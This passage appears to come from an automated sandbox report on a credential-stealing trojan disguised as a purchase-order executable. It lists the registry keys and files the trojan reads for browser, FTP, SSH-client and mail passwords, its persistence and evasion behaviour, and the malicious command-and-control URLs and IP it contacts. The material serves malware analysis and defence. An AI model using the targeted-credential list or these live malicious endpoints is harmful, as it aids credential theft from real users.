                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeQueries volume information: C:\Users\user\AppData\Roaming\VvtddClQv.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PO-0Y9005373R664.exe PID: 6964, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: VvtddClQv.exe PID: 3788, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: VvtddClQv.exe PID: 4780, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000009.00000002.2939793723.0000000001428000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PO-0Y9005373R664.exe PID: 2940, type: MEMORYSTR
                        Source: Yara matchFile source: PO-0Y9005373R664.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.5500000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.VvtddClQv.exe.29b9d20.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.5500000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.PO-0Y9005373R664.exe.6c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1758190593.0000000005500000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.1684307388.00000000006C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1745375841.0000000003B73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\VvtddClQv.exe, type: DROPPED
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: PopPassword14_2_0040D069
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: SmtpPassword14_2_0040D069
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: PO-0Y9005373R664.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.5500000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.VvtddClQv.exe.29b9d20.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.5500000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.PO-0Y9005373R664.exe.6c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1758190593.0000000005500000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.1684307388.00000000006C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1745375841.0000000003B73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\VvtddClQv.exe, type: DROPPED
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Scheduled Task/Job
                        1
                        Scheduled Task/Job
                        111
                        Process Injection
                        1
                        Masquerading
                        2
                        OS Credential Dumping
                        111
                        Security Software Discovery
                        Remote Services1
                        Email Collection
                        1
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/Job1
                        DLL Side-Loading
                        1
                        Scheduled Task/Job
                        11
                        Disable or Modify Tools
                        2
                        Credentials in Registry
                        1
                        Process Discovery
                        Remote Desktop Protocol11
                        Archive Collected Data
                        1
                        Ingress Tool Transfer
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        DLL Side-Loading
                        31
                        Virtualization/Sandbox Evasion
                        Security Account Manager31
                        Virtualization/Sandbox Evasion
                        SMB/Windows Admin Shares2
                        Data from Local System
                        1
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                        Process Injection
                        NTDS1
                        Application Window Discovery
                        Distributed Component Object ModelInput Capture111
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                        Deobfuscate/Decode Files or Information
                        LSA Secrets2
                        File and Directory Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                        Obfuscated Files or Information
                        Cached Domain Credentials13
                        System Information Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                        Software Packing
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Timestomp
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        DLL Side-Loading
                        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1501076 Sample: PO-0Y9005373R664.exe Startdate: 29/08/2024 Architecture: WINDOWS Score: 100 47 Multi AV Scanner detection for domain / URL 2->47 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 14 other signatures 2->53 7 PO-0Y9005373R664.exe 7 2->7         started        11 VvtddClQv.exe 5 2->11         started        process3 file4 37 C:\Users\user\AppData\Roaming\VvtddClQv.exe, PE32 7->37 dropped 39 C:\Users\...\VvtddClQv.exe:Zone.Identifier, ASCII 7->39 dropped 41 C:\Users\user\AppData\Local\...\tmpB962.tmp, XML 7->41 dropped 43 C:\Users\user\...\PO-0Y9005373R664.exe.log, ASCII 7->43 dropped 55 Uses schtasks.exe or at.exe to add and modify task schedules 7->55 57 Adds a directory exclusion to Windows Defender 7->57 59 Injects a PE file into a foreign processes 7->59 13 PO-0Y9005373R664.exe 102 7->13         started        17 powershell.exe 23 7->17         started        19 powershell.exe 23 7->19         started        21 schtasks.exe 1 7->21         started        61 Multi AV Scanner detection for dropped file 11->61 63 Tries to steal Mail credentials (via file registry) 11->63 65 Machine Learning detection for dropped file 11->65 23 schtasks.exe 11->23         started        25 VvtddClQv.exe 11->25         started        signatures5 process6 dnsIp7 45 104.248.205.66, 49713, 49714, 49715 DIGITALOCEAN-ASNUS United States 13->45 67 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->67 69 Tries to steal Mail credentials (via file / registry access) 13->69 71 Tries to harvest and steal ftp login credentials 13->71 73 Tries to harvest and steal browser information (history, passwords, etc) 13->73 75 Loading BitLocker PowerShell Module 17->75 27 conhost.exe 17->27         started        29 WmiPrvSE.exe 17->29         started        31 conhost.exe 19->31         started        33 conhost.exe 21->33         started        35 conhost.exe 23->35         started        signatures8 process9

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        PO-0Y9005373R664.exe53%ReversingLabsWin32.Trojan.Leonem
                        PO-0Y9005373R664.exe59%VirustotalBrowse
                        PO-0Y9005373R664.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\VvtddClQv.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\VvtddClQv.exe53%ReversingLabsWin32.Trojan.Leonem
                        C:\Users\user\AppData\Roaming\VvtddClQv.exe59%VirustotalBrowse
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://kbfvzoboss.bid/alien/fre.php100%URL Reputationmalware
                        http://alphastand.win/alien/fre.php100%URL Reputationmalware
                        http://alphastand.trade/alien/fre.php100%URL Reputationmalware
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                        http://alphastand.top/alien/fre.php100%URL Reputationmalware
                        http://www.ibsensoftware.com/0%URL Reputationsafe
                        http://104.248.205.66/index.php/17008709100%Avira URL Cloudphishing
                        http://104.248.205.66/index.php/1700870920%VirustotalBrowse
                        No contacted domains info
                        NameMaliciousAntivirus DetectionReputation
                        http://104.248.205.66/index.php/17008709true
                        • 20%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        http://kbfvzoboss.bid/alien/fre.phptrue
                        • URL Reputation: malware
                        unknown
                        http://alphastand.win/alien/fre.phptrue
                        • URL Reputation: malware
                        unknown
                        http://alphastand.trade/alien/fre.phptrue
                        • URL Reputation: malware
                        unknown
                        http://alphastand.top/alien/fre.phptrue
                        • URL Reputation: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
